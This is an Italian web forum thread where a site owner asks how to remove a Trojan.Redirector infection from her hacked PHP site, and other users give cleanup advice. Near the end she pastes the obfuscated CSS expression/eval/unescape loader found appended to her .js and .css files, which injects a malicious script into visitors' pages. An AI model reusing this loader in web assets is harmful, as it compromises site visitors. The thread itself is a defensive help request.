• User Attivo

    un virus in tutte le pagine del sito??

    scusate, molti (troppi!!) utenti mi dicono che in quasi ogni pagina php del mio sito viene allertato l'antivirus con i virus più disparati...tojan..redirect.js...ecc

    mi hanno per ora avvisata...per il blog, il guestbook, la top100, ecc

    possibile?? come lo trovo??? e soprattutto come lo elimno???


  • Moderatore

    Usi qualche servizio esterno? A volte questi servizi tipo contatori sono invasivi e vengono presi per malware però può anche essere che le tue pagine PHP siano state effettivamente infettate, soprattutto se il software non ha tutti gli aggiornamenti di sicurezza: contatta il tuo maintainer che può fare una scansione del server e dirti qualcosa di preciso.


  • User Newbie

    ciao,
    dovresti iniziare a controllare se c'è stata qualche intrusione sul tuo sito o sul server che lo ospita (magari chiedi al tuo provider). Inoltre se mi passi il link del tuo sito posso provare a darti una mano.

    saluti


  • User Attivo

    @ganger said:

    ciao,
    dovresti iniziare a controllare se c'è stata qualche intrusione sul tuo sito o sul server che lo ospita (magari chiedi al tuo provider). Inoltre se mi passi il link del tuo sito posso provare a darti una mano.

    saluti

    il sito è quello in firma...grazie...

    (sto eliminando nel frattempo dei contatori di visite...forse sono loro la causa...)


  • User Newbie

    ciao,
    ho controllato il tuo sito e per tua sfortuna ti devo dire che il tuo sito è stato bucato.

    Come primo consiglio ti dico di contattare il tuo fornitore di hosting affinchè anche loro possano verificare se il problema è legato ad una loro configurazione o è limitato al tuo sito web.

    Da quanto ho potuto constatare il problema sembra essere "limitato" alla sezione blog. Per questo sei invitata ad aggiornare all'ultima versione del software di blogging che utilizzi al fine di cercare di risolvere eventuali bug presenti nella versione che ora stai utilizzando.

    Dopo un giro sul tuo sito sono riuscito ad identificare i seguenti file:

    /ricette/lib/savant2/tests/ipojo/check.js
    /ricette/lib/savant2/tests/ipojo/t.htm
    /ricette/lib/savant2/tests/ipojo/blog.htm
    /ricette/lib/savant2/tests/ipojo/dummy.htm

    Questi file vengono installati da un virus denominato Trojan.Redirector. Attualmente se hai installato un buon antivirus sul tuo computer potresti provare a fare un copia sul tuo computer dell'intero sito e fare una scansione di tali file per trovare altri file infetti.

    I file da me proposti non sono, quasi sicuramente, la totalità dei file infettati presenti all'interno del tuo sito ma mi pare un buon inizio quanto meno potresti iniziare ad arginare il problema.

    Se hai una copia di backup e vuoi provare a ripristinarla ti suggerisco di controllare l'esistenza di tali file prima di effettuare la procedura di ripristino. Nel caso in cui tali file siano presenti mi pare ovvio di non ripristinare la vecchia versione. Una volta effettuato il ripristino ti conviene sempre aggiornare ogni singolo componente (il blog, il forum etc etc) presente sul tuo sito all'ultima versione disponibile.

    Ti ricordo inoltre di contattare il tuo provider al fine di verificare se anche altri siti ospitati sullo stesso server siano infetti.

    Se hai altre domande resto a disposizione

    saluti


  • User Attivo

    grazie ganger seguirò i tuoi consigli alla lettera!!!

    poi magari verrò qui ad aggiornare la situazione potrebbe essere di aiuto ad altri nella mia stessa situazione!!!

    ancora grazie


  • User Attivo

    @ganger said:

    Come primo consiglio ti dico di contattare il tuo fornitore di hosting affinchè anche loro possano verificare se il problema è legato ad una loro configurazione o è limitato al tuo sito web.
    ...

    Ti ricordo inoltre di contattare il tuo provider al fine di verificare se anche altri siti ospitati sullo stesso server siano infetti.

    ecco il mio ticket sul provider che uso:

    Il mio sito è stato colpito da un virus denominato Trojan.Redirector. Parecchi miei script ne sono rimasti colpiti ...ricettario, blog, guestbook e top100 ...questi sono quelli di cui ho avuto segnalazione dagli utenti e sto cercando di provvedere. Potete intanto verificare se altri siti ospitati sul mio stesso server hanno di questi problemi?
    Potrei sapere il server a cui sono appoggiata a quale nodo corrisponde? Sto leggendo le vostre comunicazioni in merito...
    grazie x la collaborazione

    Risposta del tecnico del Supporto di Primo Livello:

    la ringraziamo per averci contattato.

    Il suo sito è sul nodo 04.

    Non abbiamo purtroppo strumenti per fare la verifica richiesta.

    Le auguriamo buona giornata.

    decisamente è ora che cambi provider!!!!!

    Nel frattempo è successa una cosa stranissima, si è autoinstallata una cartella nel server, se posso allego lo zip...
    Questa cartella fa sì che nel mio sito ci siano delle pagine di blog NON MIEI con numerosi commenti in inglese e italiano....
    non posso mettere il link...vorrei far vedere la pagina che appare CHE NON E' AFFATTO MIA!!!!
    per inviarli in allegato ho dovuto eliminare centinaia di file .php che erano in quella cartella perchè di dimensioni troppo grandi....


  • User Attivo

    dunque...dopo accurata ricerca:

    in tutti i file con estensione .js e .css c'è uno strano testo in fondo in fondo...che riporto:

                                                                                                                                        /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%36%37%33%33%33%3B%20%4A%53%53%33%20%3D%20%27%2F%72%69%63%65%74%74%65%2F%6C%69%62%2F%73%61%76%61%6E%74%32%2F%74%65%73%74%73%2F%69%70%6F%6A%6F%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%72%69%63%65%74%74%65%2F%6C%69%62%2F%73%61%76%61%6E%74%32%2F%74%65%73%74%73%2F%69%70%6F%6A%6F%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */       
    

    che non appare negli stessi file in locale...

    allora ho eliminato MANUALMENTE questa stringa da tutti i file che la contenevano...ma dopo qualche giorno è riapparsa...

    facendo poi la scansione, l'antivirus mi elimina diversi virus trojan ecc nella cartella in questione però se vado a controllare quei file...la stringa c'è ancora...

    come faccio a debellare il virus????